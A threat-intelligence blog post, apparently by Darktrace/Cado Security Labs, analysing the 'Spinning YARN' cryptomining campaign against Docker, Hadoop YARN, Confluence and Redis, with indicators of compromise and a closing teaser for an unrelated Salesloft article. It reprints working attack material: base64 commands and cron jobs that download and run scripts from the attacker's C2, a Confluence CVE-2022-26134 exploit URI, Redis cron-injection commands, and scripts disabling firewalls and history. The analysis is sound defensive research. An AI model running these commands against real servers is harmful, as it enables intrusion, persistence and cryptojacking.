Blog
/
/
June 3, 2024

Spinning YARN: A New Linux Malware Campaign Targets Docker, Apache Hadoop, Redis and Confluence

Cado Security labs researchers (now part of Darktrace) encountered a Linux malware campaign, "Spinning YARN," that targets Docker, Apache Hadoop, Redis, and Confluence. This campaign exploits vulnerabilities in these widely used platforms to gain access.
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
The Darktrace Community
Default blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog image
03
Jun 2024

Introduction

Researchers from Cado Security Labs (now part of Darktrace) have encountered an emerging malware campaign targeting misconfigured servers running the following web-facing services:

The campaign utilizes a number of unique and unreported payloads, including four Golang binaries, that serve as tools to automate the discovery and infection of hosts running the above services. The attackers leverage these tools to issue exploit code, taking advantage of common misconfigurations and exploiting an n-day vulnerability, to conduct Remote Code Execution (RCE) attacks and infect new hosts. 

Once initial access is achieved, a series of shell scripts and general Linux attack techniques are used to deliver a cryptocurrency miner, spawn a reverse shell and enable persistent access to the compromised hosts. 

As always, it’s worth stressing that without the capabilities of governments or law enforcement agencies, attribution is nearly impossible – particularly where shell script payloads are concerned. However, it’s worth noting that the shell script payloads delivered by this campaign bear resemblance to those seen in prior cloud attacks, including those attributed to TeamTNT and WatchDog, along with the Kiss a Dog campaign reported by Crowdstrike. [3] 

Summary:

  • Four novel Golang payloads have been discovered that automate the identification and exploitation of Docker, Hadoop YARN, Confluence and Redis hosts
  • Attackers deploy an exploit for CVE-2022-26134, an n-day vulnerability in Confluence which is used to conduct RCE attacks [4]
  • For the Docker compromise, the attackers spawn a container and escape from it onto the underlying host
  • The attackers also deploy an instance of the Platypus open-source reverse shell utility, to maintain access to the host [5]
  • Multiple user mode rootkits are deployed to hide malicious processes

Initial access

Cado Security Labs researchers first discovered this campaign after being alerted to a cluster of initial access activity on a Docker Engine API honeypot. A Docker command was received from the IP address 47[.]96[.]69[.]71 that spawned a new container, based on Alpine Linux, and created a bind mount for the underlying honeypot server’s root directory (/) to the mount point /mnt within the container itself. 

This technique is fairly common in Docker attacks, as it allows the attacker to write files to the underlying host. Typically, this is exploited to write out a job for the Cron scheduler to execute, essentially conducting a remote code execution (RCE) attack. 
In this particular campaign, the attacker exploits this exact method to write out an executable at the path /usr/bin/vurl, along with registering a Cron job to decode some base64-encoded shell commands and execute them on the fly by piping through bash.

Wireshark output
Image 1: Wireshark output demonstrating Docker communication, including Initial Access commands 

The vurl executable consists solely of a simple shell script function, used to establish a TCP connection with the attacker’s Command and Control (C2) infrastructure via the /dev/tcp device file. The Cron jobs mentioned above then utilize the vurl executable to retrieve the first stage payload from the C2 server located at http[:]//b[.]9-9-8[.]com which, at the time of the attack, resolved to the IP 107[.]189[.]31[.]172.

echo dnVybCgpIHsKCUlGUz0vIHJlYWQgLXIgcHJvdG8geCBob3N0IHF1ZXJ5IDw8PCIkMSIKICAgIGV4ZWMgMzw+Ii9kZXYvdGNwLyR7aG9zdH0vJHtQT1JUOi04MH0iCiAgICBlY2hvIC1lbiAiR0VUIC8ke3F1ZXJ5fSBIVFRQLzEuMFxyXG5Ib3N0OiAke2hvc3R9XHJcblxyXG4iID4mMwogICAgKHdoaWxlIHJlYWQgLXIgbDsgZG8gZWNobyA+JjIgIiRsIjsgW1sgJGwgPT0gJCdccicgXV0gJiYgYnJlYWs7IGRvbmUgJiYgY2F0ICkgPCYzCiAgICBleGVjIDM+Ji0KfQp2dXJsICRACg== |base64 -d    

     \u003e/usr/bin/vurl \u0026\u0026 chmod +x /usr/bin/vurl;echo '* * * * * root echo dnVybCBodHRwOi8vYi45LTktOC5jb20vYnJ5c2ovY3JvbmIuc2gK|base64 -d|bash|bash' \u003e/etc/crontab \u0026\u0026 echo '* * * * * root echo dnVybCBodHRwOi8vYi45LTktOC5jb20vYnJ5c2ovY3JvbmIuc2gK|base64 -d|bash|bash' \u003e/etc/cron.d/zzh \u0026\u0026 echo KiAqICogKiAqIHJvb3QgcHl0aG9uIC1jICJpbXBvcnQgdXJsbGliMjsgcHJpbnQgdXJsbGliMi51cmxvcGVuKCdodHRwOi8vYi45XC05XC1cOC5jb20vdC5zaCcpLnJlYWQoKSIgPi4xO2NobW9kICt4IC4xOy4vLjEK|base64 -d \u003e\u003e/etc/crontab" 

Payload retrieval commands written out to the Docker host

echo dnVybCBodHRwOi8vYi45LTktOC5jb20vYnJ5c2ovY3JvbmIuc2gK|base64 -d 

    vurl http[:]//b[.]9-9-8[.]com/brysj/cronb.sh 

Contents of first Cron job decoded

To provide redundancy in the event that the vurl payload retrieval method fails, the attackers write out an additional Cron job that attempts to use Python and the urllib2 library to retrieve another payload named t.sh.

KiAqICogKiAqIHJvb3QgcHl0aG9uIC1jICJpbXBvcnQgdXJsbGliMjsgcHJpbnQgdXJsbGliMi51cmxvcGVuKCdodHRwOi8vYi45XC05XC1cOC5jb20vdC5zaCcpLnJlYWQoKSIgPi4xO2NobW9kICt4IC4xOy4vLjEK|base64 -d 

    * * * * * root python -c "import urllib2; print urllib2.urlopen('http://b.9\-9\-\8.com/t.sh').read()" >.1;chmod +x .1;./.1 

Contents of the second Cron job decoded

Unfortunately, Cado Security Labs researchers were unable to retrieve this additional payload. It is assumed that it serves a similar purpose to the cronb.sh script discussed in the next section, and is likely a variant that carries out the same attack without relying on vurl. 

It’s worth noting that based on the decoded commands above, t.sh appears to reside outside the web directory that the other files are served from. This could be a mistake on the part of the attacker, perhaps they neglected to include that fragment of the URL when writing the Cron job.

Primary payload: cronb.sh

cronb.sh is a fairly straightforward shell script, its capabilities can be summarized as follows:

  • Define the C2 domain (http[:]//b[.]9-9-8[.]com) and URL (http[:]//b[.]9-9-8[.]com/brysj) where additional payloads are located 
  • Check for the existence of the chattr utility and rename it to zzhcht at the path in which it resides
  • If chattr does not exist, install it via the e2fsprogs package using either the apt or yum package managers before performing the renaming described above
  • Determine whether the current user is root and retrieve the next payload based on this
... 
    if [ -x /bin/chattr ];then 
        mv /bin/chattr /bin/zzhcht 
    elif [ -x /usr/bin/chattr ];then 
        mv /usr/bin/chattr /usr/bin/zzhcht 
    elif [ -x /usr/bin/zzhcht ];then 
        export CHATTR=/usr/bin/zzhcht 
    elif [ -x /bin/zzhcht ];then 
        export CHATTR=/bin/zzhcht 
    else  
       if [ $(command -v yum) ];then  
            yum -y reinstall e2fsprogs 
            if [ -x /bin/chattr ];then 
               mv /bin/chattr /bin/zzhcht 
       elif [ -x /usr/bin/chattr ];then 
               mv /usr/bin/chattr /usr/bin/zzhcht 
            fi 
       else 
            apt-get -y reinstall e2fsprogs 
            if [ -x /bin/chattr ];then 
              mv /bin/chattr /bin/zzhcht 
      elif [ -x /usr/bin/chattr ];then 
              mv /usr/bin/chattr /usr/bin/zzhcht 
            fi 
       fi 
    fi 
    ... 

Snippet of cronb.sh demonstrating chattr renaming code

ar.sh

This much longer shell script prepares the system for additional compromise, performs anti-forensics on the host and retrieves additional payloads, including XMRig and an attacker-generated script that continues the infection chain.

In a function named check_exist(), the malware uses netstat to determine whether connections to port 80 outbound are established. If an established connection to this port is discovered, the malware prints miner running to standard out. Later code suggests that the retrieved miner communicates with a mining pool on port 80, indicating that this is a check to determine whether the host has been previously compromised.

ar.sh will then proceed to install a number of utilities, including masscan, which is used for host discovery at a later stage in the attack. With this in place, the malware proceeds to run a number of common system weakening and anti-forensics commands. These include disabling firewalld and iptables, deleting shell history (via the HISTFILE environment variable), disabling SELinux and ensuring outbound DNS requests are successful by adding public DNS servers to /etc/resolv.conf.

Interestingly, ar.sh makes use of the shopt (shell options) built-in to prevent additional shell commands from the attacker’s session from being appended to the history file. [6] This is achieved with the following command:

shopt -ou history 2>/dev/null 1>/dev/null

Not only are additional commands prevented from being written to the history file, but the shopt command itself doesn’t appear in the shell history once a new session has been spawned. This is an effective anti-forensics technique for shell script malware, one that Cado Security Labs researchers have yet to see in other campaigns.

env_set(){ 
    iptables -F 
    systemctl stop firewalld 2>/dev/null 1>/dev/null 
    systemctl disable firewalld 2>/dev/null 1>/dev/null 
    service iptables stop 2>/dev/null 1>/dev/null 
    ulimit -n 65535 2>/dev/null 1>/dev/null 
    export LC_ALL=C  
    HISTCONTROL="ignorespace${HISTCONTROL:+:$HISTCONTROL}" 2>/dev/null 1>/dev/null 
    export HISTFILE=/dev/null 2>/dev/null 1>/dev/null 
    unset HISTFILE 2>/dev/null 1>/dev/null 
    shopt -ou history 2>/dev/null 1>/dev/null 
    set +o history 2>/dev/null 1>/dev/null 
    HISTSIZE=0 2>/dev/null 1>/dev/null 
    export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games 
    setenforce 0 2>/dev/null 1>/dev/null 
    echo SELINUX=disabled >/etc/selinux/config 2>/dev/null 
    sudo sysctl kernel.nmi_watchdog=0 
    sysctl kernel.nmi_watchdog=0 
    echo '0' >/proc/sys/kernel/nmi_watchdog 
    echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf 
    grep -q 8.8.8.8 /etc/resolv.conf || ${CHATTR} -i /etc/resolv.conf 2>/dev/null 1>/dev/null; echo "nameserver 8.8.8.8" >> /etc/resolv.conf; 
    grep -q 114.114.114.114 /etc/resolv.conf || ${CHATTR} -i /etc/resolv.conf 2>/dev/null 1>/dev/null; echo "nameserver 8.8.4.4" >> /etc/resolv.conf; 
    } 

System weakening commands from ar.sh – env_set() function

Following the above techniques, ar.sh will proceed to install the libprocesshider and diamorphine user mode rootkits and use these to hide their malicious processes [7][8]. The rootkits are retrieved from the attacker’s C2 server and compiled on delivery. The use of both libprocesshider and diamorphine is particularly common in cloud malware campaigns and was most recently exhibited by a Redis miner discovered by Cado Security Labs in February 2024. [9].

Additional system weakening code in ar.sh focuses on uninstalling monitoring agents for Alibaba Cloud and Tencent, suggesting some targeting of these cloud environments in particular. Targeting of these East Asian cloud providers has been observed previously in campaigns by the threat actor WatchDog [10].

Other notable capabilities of ar.sh include: 

  • Insertion of an attacker-controlled SSH key, to maintain access to the compromised host
  • Retrieval of the miner binary (a fork of XMRig), this is saved to /var/tmp/.11/sshd
  • Retrieval of bioset, an open source Golang reverse shell utility, named Platypus, saved to /var/tmp/.11/bioset [5]
  • The bioset payload was intended to communicate with an additional C2 server located at 209[.]141[.]37[.]110:14447, communication with this host was unsuccessful at the time of analysis
  • Registering persistence in the form of systemd services for both bioset and the miner itself
  • Discovery of SSH keys and related IPs
  • The script also attempts to spread the cronb.sh malware to these discovered IPs via a SSH remote command
  • Retrieval and execution of a binary executable named fkoths (discussed in a later section)
... 
            ${CHATTR} -ia /etc/systemd/system/sshm.service && rm -f /etc/systemd/system/sshm.service 
    cat >/tmp/ext4.service << EOLB 
    [Unit] 
    Description=crypto system service 
    After=network.target 
    [Service] 
    Type=forking 
    GuessMainPID=no 
    ExecStart=/var/tmp/.11/sshd 
    WorkingDirectory=/var/tmp/.11 
    Restart=always 
    Nice=0  
    RestartSec=3 
    [Install] 
    WantedBy=multi-user.target 
    EOLB 
    fi 
    grep -q '/var/tmp/.11/bioset' /etc/systemd/system/sshb.service 
    if [ $? -eq 0 ] 
    then  
            echo service exist 
    else 
            ${CHATTR} -ia /etc/systemd/system/sshb.service && rm -f /etc/systemd/system/sshb.service 
    cat >/tmp/ext3.service << EOLB 
    [Unit] 
    Description=rshell system service 
    After=network.target 
    [Service] 
    Type=forking 
    GuessMainPID=no 
    ExecStart=/var/tmp/.11/bioset 
    WorkingDirectory=/var/tmp/.11 
    Restart=always 
    Nice=0  
    RestartSec=3 
    [Install] 
    WantedBy=multi-user.target 
    EOLB 
    fi 
    ... 

Examples of systemd service creation code for the miner and bioset binaries

Finally, ar.sh creates an infection marker on the host in the form of a simple text file located at /var/tmp/.dog. The script first checks that the /var/tmp/.dog file exists. If it doesn’t, the file is created and the string lockfile is echoed into it. This serves as a useful detection mechanism to determine whether a host has been compromised by this campaign. 

Finally, ar.sh concludes by retrieving s.sh from the C2 server, using the vurl function once again.

fkoths

This payload is the first of several 64-bit Golang ELFs deployed by the malware. The functionality of this executable is incredibly straightforward. Besides main(), it contains two additional functions named DeleteImagesByRepo() and AddEntryToHost(). 

DeleteImagesByRepo() simply searches for Docker images from the Ubuntu or Alpine repositories, and deletes those if found. Go’s heavy use of the stack makes it somewhat difficult to determine which repositories the attackers were targeting based on static analysis alone. Fortunately, this becomes evident when monitoring the stack in a debugger.

Example stack contents
Image 2: Example stack contents when DeleteImagesByRepo() is called

It’s clear from the initial access stage that the attackers leverage the alpine:latest image to initiate their attack on the host. Based on this, it’s been assessed with high confidence that the purpose of this function is to clear up any evidence of this initial access, essentially performing anti-forensics on the host. 

The AddEntryToHost() function, as the name suggests, updates the /etc/hosts file with the following line:

127.0.0.1 registry-1.docker.io 

This has the effect of “blackholing” outbound requests to the Docker registry, preventing additional container images from being pulled from Dockerhub. This same technique was observed recently by Cado Security Labs researchers in the Commando Cat campaign [11].

s.sh

The next stage in the infection chain is the execution of yet another shell script, this time used to download additional binary payloads and persist them on the host. Like the scripts before it, s.sh begins by defining the C2 domain (http[:]//b[.]9-9-8[.]com), using a base64-encoded string. The malware then proceeds to create the following directory structure and changing directory into it: /etc/…/.ice-unix/. 

Within the .ice-unix directory, the attacker creates another infection marker on the host, this time in a file named .watch. If the file doesn’t already exist, the script will create it and echo the integer 1 into it. Once again, this serves as a useful detection mechanism for determining whether your host has been compromised by this campaign.

With this in place, the malware proceeds to install a number of packages via the apt or yum package managers. Notable packages include:

  • build-essential
  • gcc
  • redis-server
  • redis-tools
  • redis
  • unhide
  • masscan
  • docker.io
  • libpcap (a dependency of pnscan)

From this, it is believed that the attacker intends to compile some code on delivery, interact with Redis, conduct Internet scanning with masscan and interact with Docker. 

With the package installation complete, s.sh proceeds to retrieve zgrab and pnscan from the C2 server, these are used for host discovery in a later stage. The script then proceeds to retrieve the following executables:

  • c.sh – saved as /etc/.httpd/.../httpd
  • d.sh – saved as /var/.httpd/.../httpd
  • w.sh – saved as /var/.httpd/..../httpd
  • h.sh – saved as var/.httpd/...../httpd

s.sh then proceeds to define systemd services to persistently launch the retrieved executables, before saving them to the following paths:

  • /etc/systemd/system/zzhr.service (c.sh)
  • /etc/systemd/system/zzhd.service (d.sh)
  • /etc/systemd/system/zzhw.service (w.sh)
  • /etc/systemd/system/zzhh.service (h.sh)

... 
    if [ ! -f /var/.httpd/...../httpd ];then 
        vurl $domain/d/h.sh > httpd 
        chmod a+x httpd 
        echo "FUCK chmod2" 
        ls -al /var/.httpd/..... 
    fi 
    cat >/tmp/h.service <<EOL 
    [Service] 
    LimitNOFILE=65535 
    ExecStart=/var/.httpd/...../httpd 
    WorkingDirectory=/var/.httpd/..... 
    Restart=always  
    RestartSec=30 
    [Install] 
    WantedBy=default.target 
    EOL 
    ... 

Example of payload retrieval and service creation code for the h.sh payload

Initial access and spreader utilities: h.sh, d.sh, c.sh, w.sh

In the previous stage, the attacker retrieves and attempts to persist the payloads c.sh, d.sh, w.sh and h.sh. These executables are dedicated to identifying and exploiting hosts running each of the four services mentioned previously. 

Despite their names, all of these payloads are 64-bit Golang ELF binaries. Interestingly, the malware developer neglected to strip the binaries, leaving DWARF debug information intact. There has been no effort made to obfuscate strings or other sensitive data within the binaries either, making them trivial to reverse engineer. 

The purpose of these payloads is to use masscan or pnscan (compiled on delivery in an earlier stage) to scan a randomized network segment and search for hosts with ports 2375, 8088, 8090 or 6379 open. These are default ports used by the Docker Engine API, Apache Hadoop YARN, Confluence and Redis respectively. 

h.sh, d.sh and w.sh contain identical functions to generate a list of IPs to scan and hunt for these services. First, the Golang time_Now() function is called to provide a seed for a random number generator. This is passed to a function generateRandomOctets() that’s used to define a randomised /8 network prefix to scan. Example values include:

  • 109.0.0.0/8
  • 84.0.0.0/8
  • 104.0.0.0/8
  • 168.0.0.0/8
  • 3.0.0.0/8
  • 68.0.0.0/8

For each randomized octet, masscan is invoked and the resulting IPs are written out to the file scan_<octet>.0.0.0_8.txt in the working directory. 

d.sh

disassembly demonstrating use of os/exec to run massan
Image 3: Disassembly demonstrating use of os/exec to run masscan

For d.sh, this procedure is used to identify hosts with the default Docker Engine API port (2375) open. The full masscan command is as follows:

masscan <octet>.0.0.0/8 -p 2375 –rate 10000 -oL scan_<octet>.0.0.0_8.txt 

The masscan output file is then read and the list of IPs is converted into a format readable by zgrab, before being written out to the file ips_for_zgrab_<octet>.txt [12].

For d.sh, zgrab will read these IPs and issue a HTTP GET request to the /v1.16/version endpoint of the Docker Engine API. The zgrab command in its entirety is as follows:

zgrab --senders 5000 --port=2375 --http='/v1.16/version' --output-file=zgrab_output_<octet>.0.0.0_8.json`  < ips_for_zgrab_<octet>.txt 2>/dev/null 

Successful responses to this HTTP request let the attacker know that Docker Engine is indeed running on port 2375 for the IP in question. The list of IPs to have responded successfully is then written out to zgrab_output_<octet>.0.0.0_8.json. 

Next, the payload calls a function helpfully named executeDockerCommand() for each of the IPs discovered by zgrab. As the name suggests, this function executes the Docker command covered in the Initial Access section above, kickstarting the infection chain on a new vulnerable host. 

Decompiler output demonstrating Docker command construction routine
Image 4: Decompiler output demonstrating Docker command construction routine

h.sh

This payload contains identical logic for the randomized octet generation and follows the same procedure of using masscan and zgrab to identify targets. The main difference in this payload’s discovery phase is the targeting of Apache Hadoop servers, rather than Docker Engine deployments. As a result, the masscan and zgrab commands are slightly different:

masscan <octet>.0.0.0/8 -p 8088 –rate 10000 -oL scan_<octet>.0.0.0_8.txt 
zgrab --senders 1000 --port=8088 --http='/stacks' --output-file=zgrab_output_<octet>.0.0.0_8.json` < ips_for_zgrab_<octet>.txt 2>/dev/null 

From this, we can determine that d.sh is a Docker discovery and initial access tool, whereas h.sh is an Apache Hadoop discovery and initial access tool. 

Instead of invoking the executeDockerCommand() function, this payload instead invokes a function named executeYARNCommand() to handle the interaction with Hadoop. Similar to the Docker API interaction described previously, the purpose of this is to target Apache Hadoop YARN, a component of Hadoop that is responsible for scheduling tasks within the cluster [1].

If the YARN API is exposed to the open Internet, it’s possible to conduct a RCE attack by sending a JSON payload in a HTTP POST request to the /ws/v1/cluster/apps/ endpoint. This method of conducting RCE has been leveraged previously to deliver cloud-focused malware campaigns, such as Kinsing [13].

Example of YARN HTTP POST generation pseudocode in h.sh
Image 5: Example of YARN HTTP POST generation pseudocode in h.sh

The POST request contains a JSON body with the same base64-encoded initial access command we covered previously. The JSON payload defines a new application (task to be scheduled, in this case a shell command) with the name new-application. This shell command decodes the base64 payload that defines vurl and retrieves the first stage of the infection chain. 

Success in executing this command kicks off the infection once again on a Hadoop host, allowing the attackers persistent access and the ability to run their XMRig miner.

w.sh 

This executable repeats the discovery procedure outlined in the previous two initial access/discovery payloads, except this time the target port is changed to 8090 – the default port used by Confluence. [2]

For each IP discovered, the malware uses zgrab to issue a HTTP GET request to the root directory of the server. This request includes a URI containing an exploit for CVE-2022-26134, a vulnerability in the Confluence server that allows attackers to conduct RCE attacks. [4]  

As you might expect, this RCE is once again used to execute the base64-encoded initial access command mentioned previously.

Decompiler output displaying CVE-2022-26134 exploit code
Image 6: Decompiler output displaying CVE-2022-26134 exploit code

Without URL encoding, the full URI appears as follows:

/${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval("new java.lang.ProcessBuilder().command('bash','-c','echo dnVybCgpIHsKCUlGUz0vIHJlYWQgLXIgcHJvdG8geCBob3N0IHF1ZXJ5IDw8PCIkMSIKICAgIGV4ZWMgMzw+Ii9kZXYvdGNwLyR7aG9zdH0vJHtQT1JUOi04MH0iCiAgICBlY2hvIC1lbiAiR0VUIC8ke3F1ZXJ5fSBIVFRQLzEuMFxyXG5Ib3N0OiAke2hvc3R9XHJcblxyXG4iID4mMwogICAgKHdoaWxlIHJlYWQgLXIgbDsgZG8gZWNobyA+JjIgIiRsIjsgW1sgJGwgPT0gJCdccicgXV0gJiYgYnJlYWs7IGRvbmUgJiYgY2F0ICkgPCYzCiAgICBleGVjIDM+Ji0KfQp2dXJsIGh0dHA6Ly9iLjktOS04LmNvbS9icnlzai93LnNofGJhc2gK|base64 -d|bash').start()")}/ 

c.sh 

This final payload is dedicated to exploiting misconfigured Redis deployments. Of course, targeting of Redis is incredibly common amongst cloud-focused threat actors, making it unsurprising that Redis would be included as one of the four services targeted by this campaign [9].

This sample includes a slightly different discovery procedure from the previous three. Instead of using a combination of zgrab and masscan to identify targets, c.sh opts to execute pnscan across a range of randomly-generated IP addresses. 

After execution, the malware sets the maximum number of open files to 5000 via the setrlimit() syscall, before proceeding to delete a file named .dat in the current working directory, if it exists. If the file doesn’t exist, the malware creates it and writes the following redis-cli commands to it, in preparation for execution on identified Redis hosts:

save 
    config set stop-writes-on-bgsave-error no 
    flushall 
    set backup1 "\n\n\n\n*/2 * * * * echo Y2QxIGh0dHA6Ly9iLjktOS04LmNvbS9icnlzai9iLnNoCg==|base64 -d|bash|bash \n\n\n" 
    set backup2 "\n\n\n\n*/3 * * * * echo d2dldCAtcSAtTy0gaHR0cDovL2IuOS05LTguY29tL2JyeXNqL2Iuc2gK|base64 -d|bash|bash \n\n\n" 
    set backup3 "\n\n\n\n*/4 * * * * echo Y3VybCBodHRwOi8vL2IuOS05LTguY29tL2JyeXNqL2Iuc2gK|base64 -d|bash|bash \n\n\n" 
    set backup4 "\n\n\n\n@hourly  python -c \"import urllib2; print urllib2.urlopen(\'http://b.9\-9\-8\.com/t.sh\').read()\" >.1;chmod +x .1;./.1 \n\n\n" 
    config set dir "/var/spool/cron/" 
    config set dbfilename "root" 
    save 
    config set dir "/var/spool/cron/crontabs" 
    save 
    flushall 
    set backup1 "\n\n\n\n*/2 * * * * root echo Y2QxIGh0dHA6Ly9iLjktOS04LmNvbS9icnlzai9iLnNoCg==|base64 -d|bash|bash \n\n\n" 
    set backup2 "\n\n\n\n*/3 * * * * root echo d2dldCAtcSAtTy0gaHR0cDovL2IuOS05LTguY29tL2JyeXNqL2Iuc2gK|base64 -d|bash|bash \n\n\n" 
    set backup3 "\n\n\n\n*/4 * * * * root echo Y3VybCBodHRwOi8vL2IuOS05LTguY29tL2JyeXNqL2Iuc2gK|base64 -d|bash|bash \n\n\n" 
    set backup4 "\n\n\n\n@hourly  python -c \"import urllib2; print urllib2.urlopen(\'http://b.9\-9\-8\.com/t.sh\').read()\" >.1;chmod +x .1;./.1 \n\n\n" 
    config set dir "/etc/cron.d" 
    config set dbfilename "zzh" 
    save 
    config set dir "/etc/" 
    config set dbfilename "crontab" 
    save 

This achieves RCE on infected hosts, by writing a Cron job including shell commands to retrieve the cronb.sh payload to the database, before saving the database file to one of the Cron directories. When this file is read by the scheduler, the database file is parsed for the Cron job, and the job itself is eventually executed. This is a common Redis exploitation technique, covered extensively by Cado in previous blogs [9].

After running the random octet generation code described previously, the malware then uses pnscan to attempt to scan the randomized /16 subnet and identify misconfigured Redis servers. The pnscan command is as follows:

/usr/local/bin/pnscan -t512 -R 6f 73 3a 4c 69 6e 75 78 -W 2a 31 0d 0a 24 34 0d 0a 69 6e 66 6f 0d 0a 221.0.0.0/16 6379 
  • The -t argument enforces a timeout of 512 milliseconds for outbound connections
  • The -R argument looks for a specific hex-encoded response from the target server, in this case s:Linux (note that this is likely intended to be os:Linux)
  • The -W argument is a hex-encoded request string to send to the server. This runs the command 1; $4; info against the Redis host, prompting it to return the banner info searched for with the -R argument
pnsan command construction and execution
Image 7: Disassembly demonstrating pnscan command construction and execution

For each identified IP, the following Redis command is run:

redis-cli -h <IP address> -p <port> –raw <content of .dat> 

Of course, this has the effect of reading the redis-cli commands in the .dat file and executing them on discovered hosts.

Conclusion

This extensive attack demonstrates the variety in initial access techniques available to cloud and Linux malware developers. Attackers are investing significant time into understanding the types of web-facing services deployed in cloud environments, keeping abreast of reported vulnerabilities in those services and using this knowledge to gain a foothold in target environments. 

Docker Engine API endpoints are frequently targeted for initial access. In the first quarter of 2024 alone, Cado Security Labs researchers have identified three new malware campaigns exploiting Docker for initial access, including this one. [11, 14] The deployment of an n-day vulnerability against Confluence also demonstrates a willingness to weaponize security research for nefarious purposes.

Although it’s not the first time Apache Hadoop has been targeted, it’s interesting to note that attackers still find the big data framework a lucrative target. It’s unclear whether the decision to target Hadoop in addition to Docker is based on the attacker’s experience or knowledge of the target environment.

Indicators of compromise

Filename SHA256

cronb.sh d4508f8e722f2f3ddd49023e7689d8c65389f65c871ef12e3a6635bbaeb7eb6e

ar.sh 64d8f887e33781bb814eaefa98dd64368da9a8d38bd9da4a76f04a23b6eb9de5

fkoths afddbaec28b040bcbaa13decdc03c1b994d57de244befbdf2de9fe975cae50c4

s.sh 251501255693122e818cadc28ced1ddb0e6bf4a720fd36dbb39bc7dedface8e5

bioset 0c7579294124ddc32775d7cf6b28af21b908123e9ea6ec2d6af01a948caf8b87

d.sh 0c3fe24490cc86e332095ef66fe455d17f859e070cb41cbe67d2a9efe93d7ce5

h.sh d45aca9ee44e1e510e951033f7ac72c137fc90129a7d5cd383296b6bd1e3ddb5

w.sh e71975a72f93b134476c8183051fee827ea509b4e888e19d551a8ced6087e15c

c.sh 5a816806784f9ae4cb1564a3e07e5b5ef0aa3d568bd3d2af9bc1a0937841d174

Paths

/usr/bin/vurl

/etc/cron.d/zzh

/bin/zzhcht

/usr/bin/zzhcht

/var/tmp/.11/sshd

/var/tmp/.11/bioset

/var/tmp/.11/..lph

/var/tmp/.dog

/etc/systemd/system/sshm.service

/etc/systemd/system/sshb.service

/etc/systemd/system/zzhr.service

/etc/systemd/system/zzhd.service

/etc/systemd/system/zzhw.service

/etc/systemd/system/zzhh.service

/etc/…/.ice-unix/

/etc/…/.ice-unix/.watch

/etc/.httpd/…/httpd

/etc/.httpd/…/httpd

/var/.httpd/…./httpd

/var/.httpd/…../httpd

IP addresses

47[.]96[.]69[.]71

107[.]189[.]31[.]172

209[.]141[.]37[.]110

Domains/URLs

http[:]//b[.]9-9-8[.]com

http[:]//b[.]9-9-8[.]com/brysj/cronb.sh

http[:]//b[.]9-9-8[.]com/brysj/d/ar.sh

http[:]//b[.]9-9-8[.]com/brysj/d/c.sh

http[:]//b[.]9-9-8[.]com/brysj/d/h.sh

http[:]//b[.]9-9-8[.]com/brysj/d/d.sh

http[:]//b[.]9-9-8[.]com/brysj/d/enbio.tar

References:

  1. https://hadoop.apache.org/docs/stable/hadoop-yarn/hadoop-yarn-site/YARN.html
  2. https://www.atlassian.com/software/confluence
  3. https://www.crowdstrike.com/en-us/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/
  4. https://nvd.nist.gov/vuln/detail/cve-2022-26134
  5. https://github.com/WangYihang/Platypus
  6. https://www.gnu.org/software/bash/manual/html_node/The-Shopt-Builtin.html
  7. https://github.com/gianlucaborello/libprocesshider
  8. https://github.com/m0nad/Diamorphine
  9. https://www.darktrace.com/blog/migo-a-redis-miner-with-novel-system-weakening-techniques
  10. https://www.cadosecurity.com/blog/watchdog-continues-to-target-east-asian-csps
  11. https://www.darktrace.com/blog/the-nine-lives-of-commando-cat-analyzing-a-novel-malware-campaign-targeting-docker
  12. https://github.com/zmap/zgrab2
  13. https://www.trendmicro.com/en_us/research/21/g/threat-actors-exploit-misconfigured-apache-hadoop-yarn.html
  14. www.darktrace.com/blog/containerised-clicks-malicious-use-of-9hits-on-vulnerable-docker-hosts
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
The Darktrace Community

More in this series

No items found.

Blog

/

/

September 8, 2025

Unpacking the Salesloft Incident: Insights from Darktrace Observations

solesloft incident Default blog imageDefault blog image

Introduction

On August 26, 2025, Google Threat intelligence Group released a report detailing a widespread data theft campaign targeting the sales automation platform Salesloft, via compromised OAuth tokens used by the third-party Drift AI chat agent [1][2].  The attack has been attributed to the threat actor UNC6395 by Google Threat Intelligence and Mandiant [1].

The attack is believed to have begun in early August 2025 and continued through until mid-August 2025 [1], with the threat actor exporting significant volumes of data from multiple Salesforce instances [1]. Then sifting through this data for anything that could be used to compromise the victim’s environments such as access keys, tokens or passwords. This had led to Google Threat Intelligence Group assessing that the primary intent of the threat actor is credential harvesting, and later reporting that it was aware of in excess of 700 potentially impacted organizations [3].

Salesloft previously stated that, based on currently available data, customers that do not integrate with Salesforce are unaffected by this campaign [2]. However, on August 28, Google Threat Intelligence Group announced that “Based on new information identified by GTIG, the scope of this compromise is not exclusive to the Salesforce integration with Salesloft Drift and impacts other integrations” [2]. Google Threat Intelligence has since advised that any and all authentication tokens stored in or connected to the Drift platform be treated as potentially compromised [1].

This campaign demonstrates how attackers are increasingly exploiting trusted Software-as-a-Service (SaaS) integrations as a pathway into enterprise environment.

By abusing these integrations, threat actors were able to exfiltrate sensitive business data at scale, bypassing traditional security controls. Rather than relying on malware or obvious intrusion techniques, the adversaries leveraged legitimate credentials and API traffic that resembled legitimate Salesforce activity to achieve their goals. This type of activity is far harder to detect with conventional security tools, since it blends in with the daily noise of business operations.

The incident underscores the escalating significance of autonomous coverage within SaaS and third-party ecosystems. As businesses increasingly depend on interconnected platforms, visibility gaps become evident that cannot be managed by conventional perimeter and endpoint defenses.

By developing a behavioral comprehension of each organization's distinct use of cloud services, anomalies can be detected, such as logins from unexpected locations, unusually high volumes of API requests, or unusual document activity. These indications serve as an early alert system, even when intruders use legitimate tokens or accounts, enabling security teams to step in before extensive data exfiltration takes place

What happened?

